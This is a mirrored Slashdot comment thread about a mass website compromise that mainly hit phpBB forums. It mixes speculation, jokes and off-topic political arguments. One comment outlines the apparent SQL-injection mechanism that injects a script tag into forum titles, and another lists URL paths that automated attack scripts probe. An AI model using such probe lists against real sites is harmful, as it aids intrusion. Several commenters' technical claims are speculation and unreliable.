Slashdot Mirror
Mass Website Hack Compromises 200,000 Sites
Stony Stevenson writes "Hot on the heels of a recent hack in which 10,000 sites were compromised, researchers have disclosed a new large-scale attack. Researchers at McAfee estimated that the attack has been active for roughly one week, and in that time frame has managed to place itself on roughly 200,000 web pages. Most of the infected pages are running the phpBB forum software, said McAfee. The compromised pages are embedded with a Javascript file that links to the site hosting the attack."
Yeah, I installed it way back in the days and forgot it was on my website. I have now gotten several emails from my domain host stating attacks on it using an exploit in phpBB.
Back in the later months of 2001 we experienced a gradual realization that there was something quite amiss about our government's response to terrorist threats which resulted in the disaster of September of that year. It turns out that not only did we know that there would be a terrorist attack, but we had credible leads indicating who and how it would be carried out. But the lack of information sharing led to disaster.
Here too, we have a threat which is already running wild. Thousands of websites are being attacked. Unfortunately, this article, like many which abound in the security theatre online media, is long on consequences and short on details. Someone knows how the attack spreads, but they aren't sharing the means of stopping the attack.
This article and its lack of content does as much to spread fear and chaos among computer users as the actual attack. These are technical problems which can be fixed. By not being clear about the threat, the article turns hackers into bogeymen that can't be stopped. Give some better info, tell us how to close the hole, and let us get back to work.
We don't run phpBB. Is it just me, or is phpBB almost always the target of these kinds of attacks? I mean, there are probably hundreds of CMS systems out there, but almost every mass site hijacking/defacement I can remember has involved phpBB.
Am I completely off-base here?
Why can't I mod "-1 Idiot"?
My old phpBB forum got hacked. Wanna know why? Cuz I used the auto-installing plugin that my host provided. It was about 20 versions behind and they NEVER updated it. So it had a gaping security hole in it. And guess what else! I couldn't patch it because it was considered some sort of embedded plugin that I couldn't tocuh the system files of. I had to install a fresh, updated version and phpBB and then copy the database over AND alter the database manually to reflect all the changes between between versions, which was a major pain in the ass. Needless to say I was pissed. Oh and I tried to sue/have arrested those Zone-H assholes that posted it like it was some sort of trophy case but apparently they're not hosted in the US so I dropped it. I would be willing to guess that every single hack was because of outdated phpBB quick installs like ipowerweb makes available on their servers.
Google's Super Secret Search Algorithm: SELECT @search_results FROM internet WHERE @search_results = 'good'
It's a good think slashdot is immu PENI5 PILLS FREE WITH DISCOUNT MORT6A6ES! PENISFREE@OFFER.COM NOW!
Table-ized A.I.
Does a light bulb dim in the minds of some computer users at the prospect of free pornography? It is the easiest thing in the world to get free porn online, why is installing something on your computer from a porn website all of a sudden appealing when a pop up window seduces you into it? I have a new term for this, it is called getting "FreePwned."
I read both those articles and got the impression that the attack was 'social engineering' meaning that phpBB's only role was to allow someone to post a URL to a site which actually hacked the stupid victims. There is no specific mention of any exploit.
There *is* a mention of an exploit on ASP machines.
I'm a little confused here - how can it be "social engineering" when the javascript required to create the porn/codec popup had to be inserted somehow?
Which is why you're supposed to upgrade. The article is incredibly short and doesn't specify, but I'd be willing to bet the exploit was one that has already been patched/revealed.
At least with this attack the computer savvy not running NoScript or the like will be able to avoid getting hit with the payload. And now, time to check to make sure my ASP pages haven't been attacked...
This IS Slashdot, right? Or have I been posting to the NSA all this time?
Hi mom!
What?
If that happens, certifications will likely be available for commercial OSes only - e.g. M$, Solaris, Novell, Redhat, OSX.
200,000 web pages is not the same thing as 200,000 web sites.
Mea navis aericumbens anguillis abundat
yes, I was wondering the same. suppose one had a site with phpbb installed and wanted to check if their site was one of those compromised. how would one go about that? tfa doesn't mention. it seems somehow half-assed to publish that several tens of thousands of sites have been compromised, yet not provide any useful information regarding detection, cleaning and prevention.
The title (which appears to be the only part the submitter actually "authored") is incorrect and conflicts with the text it quotes. An estimated 200,000 pages (most likely individual posts in phpBB forums) are out there, not sites.
According to this video, the pages are being inserted via SQL injection attacks. The 200k pages is based on a google search (he does not reveal what criteria he is searching for) which came back with 150k hits. So it is not clear how many actual sites are compromised. One could assume that once a phpBB site is compromised, every page of every thread, which is analogous to individual web pages, would redirect to the worm download site. A popular forum could easily have several thousand thread-pages. In fact, every single page would probably be redirecting, which would include each user's summary page (which would be in the thousands for even a small site). So a small number of cites could be accounting for all the 200k pages.
Also, in the video it is clear from the url that it is a phpBB2 site that is compromised. phpBB is currently at a major version of 3.
Better known as 318230.
But I've made some modifications to my install. I replaced the registration and profile pages with a web form that posts to an Email parser. There was a lot of activity the last few days, spam registrations out the yang.
It's funny because to them it looks like the registration page and they keep running scripts against it. I block the IP ranges of the spam registrations at the boundary but they just keep block hopping.
They'll still get a script reg through sometimes, so there's something I'm missing. I could just install the security updates but it's so much more fun to try and tweak it myself.
That's our life, the big wheel of shit. - The Fat Man, Blue Tango Salvage
And nothing of value was lost.
Tell him to set up power saving correctly. Although my computer needs to stay connected to the mains for suspend to ram to work. It's to most intensive purposes "turned off". Takes 7 seconds (at most) to go to sleep and a few seconds wake up and I never have a problem.
At least I think that's what it does - I've never actually used it, as the cable modem is outside my hardware firewall anyway.
The attack probably targeted phpBB2. Get the latest phpBB version which at this moment is 3.0.0.
Most of us can say phpBB or even the 1000s of php based 'pre-packaged' web sites out there are disasters waiting to happen. Either being poorly coded, not keeping up to date with the latest patches or able to use the current secure versions of PHP, etc.
The problem here is most of the people using this software has limited HTML/Web programming skills and find these as easy solutions to what they want, a site for their MMO Clan, their band, etc.
These packages are not only presented as free and easy, but safe because they are built on non-MS technologies, which is where the anti-MS FUD actually hurts the Web and consumers.
In contrast, if these projects were built on ASP for pre-processing instead of PHP, they wouldn't break with each security update as often happens in PHP land, and unlike PHP, ASP stays updated and has proven to be highly secure. The kicker with mainstream ASP is it requires an IIS server and Windows server is not always cheap or the cheapest hosting solution for these same users.
I am hoping that MS's interest in help PHP to play nice with Windows 2008 IIS even better, that as MS is able to quality check PHP code used through IIS, that MS's automation security investments will pay back to even the PHP world, as potential security risks would be something that is now also in Microsoft's interest to publish back to the PHP group.
I know this isn't saying PHP is inherently insecure, we are talking about phpBB and similar products, but if they can get into a cycle of consistent security minded models and staying current with PHP updates without having to worry about applications breaking it will make a big difference.
Developing for PHP and/or working with pre-built PHP applicaitons, I have watched developers spend the majority of their time working around bugs in the applications or in PHP itself. Where an ASP developer there are very few known problems that have to be coded around and they also don't have the hours of ensuring version matching to make the application work like you end up doing with PHP pre-built apps.
This is one area where ASP gets a nod, as keeping the versions up to date is seamless, and applications and sites designed around ASP simply don't break even with the most massive updates.
Don't, like, trust anyone with a UID shorter than 6 digits, man...
This is the kind of thing that really upsets me. I mean, if someone has the 1337z sk1llz to do this sort of thing, why aren't they using those skills to make a fortune, instead of using them to fsck up other peoples' websites? that sort of behavior ain't cool. in fact, it's decidedly uncool and people who act that way should be banished to a big island for criminals, like Australia.
You can disable the connection to the internet in your modem's driver options (or ethernet port's driver's options...) or your computer's network settings. Leaving a link to the settings on your desktop ensures you won't forget to turn it back on when you come back to your computer after going out to do whatever the hell anyone would do without a computer (buy a new moniter?).
Mind you it does take all of 20 seconds to have your network grab you an IP address...verify your computer...and finally connect. But I'm sure there's something you can do during that time (boot up your MP3 player...etc...).
Ginga no Rekshiya Mata Each page.
Buy a cheap $40 home router box.
Navicula hydraulica plena anguilarum est. Omnes castelli tuus nostri sunt. Ed elli avea del cul fatto trombetta.
Most if not all cable modems have a standby button on it to literally "turn off the internet".
It's usually located on the top, if it's a Motorola.
"We need to get over this notion, that, for Apple to win... Microsoft must lose." - Steve Jobs, 1997
When this news broke last night (my local time), my heart skipped a beat because one of my phpBB instances isn't totally up to date, so I did a quick bit of research to see if I could fill in the massive blanks left by this report. Yes, it does look like an SQL injection attack: the attack appends a SCRIPT tag to the forum's main title, which is inserted into various locations on every page from a database field. Due to one thing and another this results in some hideously malformed HTML, but it has the desired effect (of executing the Javascript) in the major browsers. I suspect that the search in question is a Google "intitle:" search which keys off the domain name of the site carrying the exploit code, since this becomes a visible part of the title.
I have no idea exactly how the SQL injection is being effected, but my phpBB forum was not impacted. This may be because my version is not too old, because I lack a vulnerable add-on module, or because my custom anti-bot mechanisms deflected the attack. I couldn't see anything in the past few days of log activity which contained key strings used in the exploit, but I didn't search very hard once I determined that my instance was unaffected.
proof, n. A demonstration that a conclusion is implied by certain premises and axioms.
It's to most intensive purposes "turned off". How about for purposes which are a bit less intensive?
Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
Granted PHPBB was hacked because it's poorly written and these sites were likely not kept up to date, but... these kinds of success large scale attacks really don't do much to show how much more secure open source software is - even very popular FOSS like this!
Yeah yeah, I know I'll be marked as troll/flamebait or whatever... but I don't see any upmodded discussion of this, it's a serious issue, if only for the perception it fosters in the industry.
Come on, this guy was right. the phpBB vulnerability has nothing to do with 9/11, and certainly nothing to do with blaming the government for 9/11.
Do you want more posts that start like this, "This reminds me of George Bush's environmental policy..."
Moderation is supposed to stop that sort of thing. Instead he's +5.
Those are my principles. If you don't like them I have others. -Groucho Marx
And then, you read the top of the report and discover that all this is old news, that you've been only reading spam for the last two years.
For a second, you think that humanity may not be the mass of morons you thought. That patching the bug will let you access the real, intelligent, acute comments of human forums.
Then, as the patch starts to work, you see those comments; the beauty of human forums brings a tear to your eye. As you start posting, you feel unable to write, your keyboard doesn't seem to work.
You then understand you were just another spam generator, and the patch is killing you.
Fade to black.
Mind you it does take all of 20 seconds to have your network grab you an IP address...verify your computer...and finally connect.
20 seconds?!? Who's got that kind of time? I'll be old by then!
"Every great cause begins as a movement, becomes a business, and eventually degenerates into a racket." -- Eric Hoffer
And Ham Radio operators should know Morse Code. .-.. --- .-..
No, that's why you're not supposed to use software which is so full of holes that the only way to keep it safe is to continuously upgrade as the problems are discovered one after another.
I noticed a sudden spike in traffic last week on one of my customer's hosted sites that ran phpBB. Sure enough they were allowing self-registration and things got worse from there. I killed the threads, users, and checked the server logs and sure enough there were some nasty processes that got left behind. After we killed them too and disabled auto-logins things went back to normal. This happened because I had recently upgraded to a stand-alone server, and the software that normally rejects automated probes for known exploits wasn't running correctly. As so many of you have said, this is a technical problem that can easily be defended against. The nature of open source software means that the code is available for scrutiny and exploit, and the side effects are a part of the 'maturing' process of such free tools.
Looking through my 404 logs I get a bunch of kiddie auto scripts either looking to BB spam or hack in, here are some items which I figure are popular entry routes:
///include/print_category.php
/forum/index.php
/bbs/include/print_category.php
/functions.php
/board/index.php
/forums/index.php
/phpbb2/index.php
//calendar//tools/send_reminders.php
//skin/zero_vote/error.php (lots of these)
/skin/zero_vote/ask_password.php
//support/mailling/maillist/inc/initdb.php (a few of these)
/function.main
/comments.php
/MSOffice/cltreq.asp
/cgi-bin/bbs/read.cgi
//include/write.php
"Enjoy what you're doing! If it becomes drudgery, you're doing it wrong!" - Jim Butterfield
Although the other guy's comment was much funnier, it probably is worth me point out the expression is "all intents and purposes" not "all intensive purposes". Still; better you make the mistake and get corrected online than in the boardroom ;-)
Great. If mods and add-ons could be more seamlessly added, that'd be great. But upgrading your phpBB when it has a half dozen mods and modifications twisted into the code is daunting at best.
The Fully Modded phpBB website is down, but it is basically a fork or extension of the base phpBB code, which remains secure.
I know I've labored the point about phpBB not being vulnerable to this kind of attack, but it really is built from the ground up for security. This exploit does not affect phpBB, just the heavily modified for "Fully Modded phpBB".
Damn, I already moderated this topic. Now I'll have to log in with my sock puppet to comment.
No, it would be people, who would be licensed, not the operating systems (which are hard to define anyway: Linux vs. Ubuntu?)
Much like plumbers and electricians...
In Soviet Washington the swamp drains you.
I'd tend to agree, actually. But, I think, it is inconsistent to require licensing for driving a car and not require it for Internet connection. There will soon be time, when a hacker will be responsible for a death — if it has not happened already...
A botnet targeting a 911 server or a utility company, or a swatting gone really wrong...
In many cases, the hackers are using other people's PCs without their knowledge — a clueless person making their PC reachable from the Internet is about as dangerous as an unlicensed driver on the highway...
In Soviet Washington the swamp drains you.
Licensing people would being its own can of worms. First, unless one handed out smartcards and passed legislation to have CAC or a similar smart card readers on every desktop and laptop, it would give identity thieves another easy target because most likely it would be implemented by requiring people to punch in an "Internet license number" for access to websites, similar to how Korea requires your residence registration number if you want to create an account on a website there. Of course, this info is easily obtained from compromised sites, sniffers, or keyloggers.
This would allow someone you wouldn't want, be it your opposition in a civil lawsuit, some stalking ex or whatnot to find every single post you have done in your life on every single website with a query, just matching your Internet ID number. I would bet that a lot of school districts would have regular searches on student Internet ID numbers to monitor what they posted, and perhaps expel them if they posted something that wasn't accepted, such as Mrs. Crabtree being a hard grader.
There are tradeoffs; I'll take the botnets over having to leave a permanent bread crumb trail of my real life information anywhere I go. At least with IP addresses, it requires a court order for ISPs to turn over username info in most cases.
I am so lucky, because I upgraded my forum phpbb2 to phpbb3 in time. I think that phpbb2 is not well writen, but it is the best free (and open source) forum cms I know. I hope phpbb3 will be better than its father. The important thing is update immediatly when a security upgrade will be released. That is my opinion.
No, you completely misread my proposal. I don't know, how to express it any clearer, so I'll just try again, with emphasis:
There. Accessing web-sites is Ok. But if you want your ISP to allow any connection initiated from the outside to reach your computer, a person licensed in Internet security (yourself or someone you hired) needs to vouch for your computer's health.
This will not stop malware distributed by e-mail, but it will cut down on the compromised web-sites — the subject of TFA.
A successful hack into your system ought also to make you financially liable to those, who your system was used against. Insurance may be available for that, with their rates being a reflection of your preparedness and history.
Very similar to how driving is handled, actually...
In Soviet Washington the swamp drains you.
In many cases, the hackers are using other people's PCs without their knowledge -- a clueless person making their PC reachable from the Internet is about as dangerous as an unlicensed driver on the highway...
Please post even a single reference to an actual death or injury that could have been prevented by licensing internet access.
What we need to do is spend less money confiscating water bottles and more detecting and prosecuting people exploiting PCs.
Yeah, that'll be great! The license fees and insurance costs will inch up until only a corporate sponsored person can afford it and web 2.0 can become boob-tube 2.0
The telecom and media industries LOVE barriers to entry because they can lobby to raise them just high enough to keep potential competition away.
No, it's not, although the difference is subtle. The original comment is referring to the fact that different government agencies had information and leads, prior to 9/11, about the attacks. It was known that there were people with no flight experience paying thousands of dollars to learn to fly commercial jets, and that these people weren't interested in learning how to take off or land. This aroused some suspicions but it wasn't followed up. There was the 20th hijacker who didn't participate in the attacks because he was in jail. But these (and other) leads were never followed up on. This doesn't mean "the government/George Bush knew about 9/11 and stood down". It means "the federal government is really big and the different agencies don't talk to each other." This is the analogy that the original commenter is trying to make: better discussion of security vulnerabilities would make it easier to fight those vulnerabilities. The original commenter ever said the US government carried out 9/11 or knew ahead of time that it would happen.
Remember the days when Republicans were the party of fiscal responsibility?
Does *anyone* know how to detect this exploit in your PHPBB install?
I've been getting auto-scripts lately on my Linux web server that are trying to explot a file called xmlrpc.php...
I love PHPBB, but I am truly disappointed with both responses I've seen from the phpBB guys. It's really a shame.
Yeah, it really sucks, that regular people can not drive their own cars any more, and are forced to take big corporation-owned buses, does not it?
In Soviet Washington the swamp drains you.
They tend to be based abroad, and the CIA's drones can only blast so many per month...
In Soviet Washington the swamp drains you.
So... you're not supposed to use software that has patches released? And/or you're expecting someone to anticipate all forms of attack when writing a program? That seems unreasonable to me. And, why not release a patch once a problem has been discovered? Don't you want your programs to get upgraded when needed?
They tend to be based abroad, and the CIA's drones can only blast so many per month...
A "please secure your %*^%*& server" from the FBI might get some action on the U.S. side without nearly the overhead of licensing.
Yeah, it really sucks, that regular people can not drive their own cars any more, and are forced to take big corporation-owned buses, does not it?
If the bus and taxi lobby were as big as telecom, that would be exactly the case. Also keep in mind that there are way too many registered voters who want to drive but not so many that want to run a server.
I'd appreciate it if you replied to the things I actually said. By doing so, I would actually be able to answer you.